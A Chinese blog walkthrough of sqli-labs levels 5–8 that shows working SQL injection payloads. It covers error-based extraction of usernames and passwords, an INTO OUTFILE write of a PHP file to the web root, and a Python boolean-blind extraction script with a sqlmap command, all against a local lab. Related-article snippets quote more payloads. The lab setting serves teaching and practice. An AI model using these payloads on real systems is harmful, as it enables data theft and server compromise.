sql注入5-8关实现

最新推荐文章于 2024-09-14 18:42:05 发布
最新推荐文章于 2024-09-14 18:42:05 发布
阅读量667 收藏 30
点赞数 17
文章标签: sql 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lxy9298/article/details/141108426
版权

sql注入第5关

在这关可能会用到的函数

  1. extractvalue:
    extractvalue函数用于从XML文档中提取特定的值。它接受两个参数,第一个参数是要提取值的XML文档,第二个参数是XPath表达式,用于指定要提取的值的位置。该函数将返回符合XPath表达式的节点的值。
  2. updatexml:
    updatexml函数用于更新XML文档中特定节点的值。它接受三个参数,第一个参数是要更新的XML文档,第二个参数是XPath表达式,用于指定要更新的节点的位置,第三个参数是新的节点值。该函数将返回更新后的XML文档。
  3. floor:
    floor函数用于向下取整,将一个数值向下取整为最接近的整数。它接受一个参数,即要进行取整操作的数值,返回最接近的小于或等于该数值的整数。例如,floor(3.8)将返回3,floor(4.2)将返回4。

传入值看是否成功
在这里插入图片描述
尝试查询一下数据库的列数

?id=1’ order by 3 --+
?id=1’ order by 4 --+

在这里插入图片描述
在这里插入图片描述
列数是3列
查询字段超过3个后页面会报错
这时可以用
?id=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+
在这里插入图片描述

?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+
在这里插入图片描述
接下来就直接利用数据库名+inforamtion_schema数据库来进行后续的注入
解决方案:
可以使用limit来限制查询个数,来一个一个查询,也可以使用group_concat时使用substr进行字符串截取 其中"1,32"控制截取的起始与结束位置
payload:
and updatexml(1,(select concat(username,0x7e,password) from users limit 0,1),1) --+
and updatexml(1,(select substr((group_concat(username,0x7e,password)),1,32) from users),1) --+

sql注入第6关

初始界面
在这里插入图片描述
尝试闭合查看
在这里插入图片描述
这关和第三关很像,参考第五关的payload

sql注入第7关

输入为id=1
在这里插入图片描述
我们就可以尝试使用这样一种方式来将一个php文件来写入到服务的目录中:
?id=1’)) union select 1,“<?phpinfo();?>”,3 into outfile “D:\PHPstudy\phpstudy_pro\WWW\aaa.php” --+
在这里插入图片描述

Mysql规定这个值为NULL,则不允许进行文件导入导出操作,因此现在我们来将该值修改为空。
尝试访问一下该文件aaa.php
在这里插入图片描述
php成功执行,本关也就成功的通关

sql注入第8关

在这里插入图片描述
尝试可以使用’))来闭合,但是它却没有报错
在这里插入图片描述
传入的id为1,则会显示:
在这里插入图片描述
无论是联合查询哈市报错注入都无法注入成功的,这里就要使用布尔盲注了
我们可以先使用 length函数 + 二分法来尝试一下
?id=1’ and (select length(database())>1) and 1=1 --+ true
?id=1’ and (select length(database())>10) and 1=1 --+ flase
?id=1’ and (select length(database())>5) and 1=1 --+ true
?id=1’ and (select length(database())>6) and 1=1 --+ true
?id=1’ and (select length(database())>8) and 1=1 --+ flase
在这里插入图片描述
在这里插入图片描述
通过页面的不同响应页面来判断数据库的长度是否是我们所指定的范围,最终可以得到数据库的名称的长度为7,得到了数据库的长度后,我们就可以再利用ascii函数+substr函数来修改字符串的范围,最终判断数据库的各个字符的ascii的值,最终就可以得到完整的数据库名称
?id=1’ and ((select ascii(substr(database(),1,1)))>100) and 1=1 --+ true
在这里插入图片描述
在这里插入图片描述
根据不断的变换范围,最后得到了第一个字母的ascii码大于113但是不大于115,因此,它的ascii码就是114,对照ASCII码表,得到第一个字母为‘s’。同样的方法,我们可以变化substr()里面的第二个参数分别为2,3,4,5,6,7,最后可以获得接下来的其他七个字母,最终得到“security”。但手工方法会非常的费时费力,可以使用python写一个二分法查找的布尔盲注脚本来方便使用:

import requests
 
url = "http://127.0.0.1/sqli-labs/Less-8/"
 
def inject_database(url):
    name = ''
 
    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr((select database()),%d,1)) > %d-- " % (i, mid)
            params = {"id": payload}
            r = requests.get(url, params=params)
            if "You are in..........." in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
 
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)
inject_database(url)

在这里插入图片描述
使用sqlmap进行时间盲注就非常简单了,直接将url输入到sqlmap中即可
sqlmap.py -u sqlmap -u http://127.0.0.1/sqli-labs/Less-8/?id=1

26-3 SQL注入攻击 - SQL注入无回显,盲注又被封怎么办?
weixin_43263566的博客
03-11 611
UNC路径的格式类似于。基于时间的盲注可以通过构造特定的SQL语句来判断条件是否成立,从而推测出数据库中的数据。盲注速度较慢且容易被WAF或防火墙封禁IP,因此利用DNSlog可以快速有效地获取数据,避免IP被封锁的情况。通过以上步骤,可以利用 DNSLog 平台或自行部署DNSLog来获取命令执行的回显信息,这在某些情况下可能用于安全测试或网络监控等需要的场景。需要注意的是,DNS查询过程中涉及到本地DNS服务器、根DNS服务器以及顶级域名服务器等不同级别的DNS服务器,通过逐级查询最终完成域名解析。
26-2 SQL注入攻击 - 堆叠注入(Stacked Injection)
weixin_43263566的博客
03-10 497
堆叠注入(Stacked Injection)是指一次性执行多条 SQL 语句的注入技术。在实际应用中,堆叠注入通常指在MySQL数据库中,通过在命令行中以分号(;)分隔每条语句来实现同时执行多条语句的注入攻击。因此,堆叠注入即为一堆(多条)SQL语句一起执行的注入攻击方式。
SQL注入练习--sqli-labs
qq_46263951的博客
02-12 2775
前言 SQL注入是比较常见的漏洞,有数据库的地方就可能存在SQL注入,所以学好SQL注入是非常有必要的,sqli-labs是一个不错的练习靶场。推荐一篇文章SQL注入之Mysql注入姿势及绕过总结 前置知识 注入流程 判断是否存在注入,注入是字符型还是数字型,闭合情况,绕过方式 ?id=1' ?id=1" ?id=1') ?id=1") ?id=1' or 1# ?id=1' or 0# ?id=1' or 1=1# ?id=1' and 1=2# ?id=1' and sleep(5)# ?id=
sql注入--POST注入
pakho_C的博客
01-04 4421
sql注入–POST注入 靶场:sqli-labs-master 下载链接:靶场下载链接 POST和GET的区别 GET提交的数据会显示在URL中,POST则不会。这是最显而易见的差别。这点意味着GET更不安全(POST也不安全,因为HTTP是明文传输抓包就能获取数据内容,要想安全还得加密) GET回退浏览器无害,POST会再次提交请求(GET方法回退后浏览器再缓存中拿结果,POST每次都会创建新资源) GET提交的数据大小有限制(是因为浏览器对URL的长度有限制,GET本身没有限制),POST没有 GET
SQL注入复现1-18
m0_68498873的博客
08-05 1103
查询列:1' and (select 1 from (select count(*),concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),'~',floor(rand(0)*2)) as x from information_schema.columns group by x) as y)--+
SQL注入详解 38-45
君莫hacker的博客
10-15 454
目录Less-38(堆叠注入)Less-39(堆叠注入)Less-40(堆叠注入)Less-41(堆叠注入)Less-42(登录点堆叠注入)Less-43Less-44Less-45 Less-38(堆叠注入) 第38总结: 从第38开始就是堆叠注入,通过构造语句,可以对数据库进行更大的利用,若权限足够高,我们可以进行对数据库的增删改查,读取写入文件,修改各用户权限,进行更多的利用 判断注入类型 单引号字符型注入 判断注入字段数及显示位置 查看数据库名 爆表 爆列 爆数据 在38,以上的注入步
易语言SQL注入源码-易语言
06-13
易语言是一种专为中国人...总之,理解和掌握SQL注入原理及防范措施对于任何开发者来说都是至重要的。易语言提供了便捷的工具和方法来处理数据库操作,但同时也需要开发者时刻警惕潜在的安全风险,确保应用的安全性。
Kali SQL注入--基于SQLi-Labs
black101的博客
07-20 1906
Kali SQL注入--基于SQLi-LabsSQLi-LabsSQL注入SQL注入的基本原理SQL注入初步实验一个结束语 SQLi-Labs SQLi-Labs是一个练习和理解SQL注入的非常合适的靶站平台,总共有75,这里我选择它做我的实验环境来对结果进行展示。 SQL注入 SQL注入的基本原理 首先,这不是一篇极为完整的SQL注入整理,这只是一篇对原理的简单复习和介绍。 SQL注入的基本原理 这是正常的SQL语句 select * from user where id = '$id' limit
SQL_Injection_Payload:SQL注入有效负载列表
01-28
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序未能正确过滤或验证用户输入的SQL命令,从而使攻击者能够执行恶意的数据库查询。标题“SQL_Injection_Payload:SQL注入有效负载列表”表明这是一个SQL注入...
sqlalchemy JSON 字段写入时中文序列化问题
llc的博客
09-12 374
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
经典sql题(一)求连续登录不少于三天用户
最新发布
m0_58076578的博客
09-14 807
去重提取日期查询:提取每个用户的唯一登录日期。结果表table1:显示每个用户的唯一日期。为每个用户生成序列号查询:为每个用户的日期生成序号,并计算date2。结果表table2:显示用户的日期和对应的date2。步骤使用函数,按照日期顺序为每个用户的登录日期分配一个序号。例如,对于用户 ID = 1,假设他们的日期是2023-10-012023-10-02和2023-10-03将为它们生成序号 1、2 和 3。date2是通过将每个日期减去它的序号得到的。这个操作的目的是为了检测连续的日期。
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 2393
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特点是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
CISP-PTE CMS sqlgun靶场
2301_81525518的博客
09-13 581
输入 -1' union select 1,2,3# 有回显可以查看数据库sql靶场有个搜索框先点一下go,有回显说明存在漏洞。查询它的数据这里admin用户的密码是md5加密。有个phpinfo.php点进去可以看到路径。然后扫描ip目录发现没有后台登录的地方。然后在这里尝试sql注入。来到根目录有个flag。然后查询数据库,用户。
Sybase「退役」在即,某公共卫生机构如何实现 SAP Sybase 到 PostgreSQL 的持续、无缝数据迁移?
Tapdata 技术博客
09-13 1017
Sybase 暂停维护在即,某公共卫生机构提出了将其键业务数据从中平稳迁移到 PostgreSQL 的需求。该如何安全、高效实现
sqlgun靶场漏洞挖掘
A2893992091的博客
09-13 213
找了半天,没有找到管理员登录界面,所以找到管理员账号和密码没有用,虽然没有,但是证明了一点,那就是此处可以无限制输入命令,并执行,通过扫描目录发现存在phpinfo文件,访问得知网站绝对路径。于是乎,尝试使用sql注入的方式,上传一句话木马。搜索框输入以下代码,验证是否存在xss漏洞。写入成功,蚁剑连接大脑,cmd代替思考。此处密码为MD5加密,解码内容如下。经过测试,输入框存在SQL注入漏洞。根据设定的地址访问上传的文件。OK了,存在xss漏洞。
【乐吾乐大屏可视化组态编辑器】API接口文档(pgsql
le5le_iot的博客
09-13 1069
采用前后端分离架构,乐吾乐后端服务提供一整套完整的web组态编辑器的所有数据接口,包含2D/3D图纸接口服务、文件接口服务和用户接口服务等,安装包版本提供后端可执行程序文件,后端源码版提供Java源码。
PostgreSQL15.x安装教程
后端开发
09-13 925
PostgreSQL 是一个功能强大的开源系型数据库系统,基于 C 语言实现,采用 PostgreSQL 许可证,这是一种自由软件许可证,允许用户自由使用、修改和分发源代码,同时支持商业用途而不设强制限制。这使得 PostgreSQL 成为广受欢迎的开源数据库解决方案。PostgreSQL 支持跨版本升级,过程通常平稳。尽管国内市场 MySQL 仍占主导地位,但许多国产数据库(如华为的 GaussDB 和腾讯的 Tbase)及云服务提供商都广泛支持 PostgreSQL。此外,pgloader。
PostgreSQL 触发器
wjs2024的博客
09-12 531
PostgreSQL触发器是一种强大的数据库对象,它可以在特定的数据库事件发生时自动执行预定义的操作。这些事件可以是插入、更新或删除表中的行。触发器通常用于强制复杂的业务规则、审计更改、同步复制数据到其他表或文件,以及提供复杂的引用完整性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值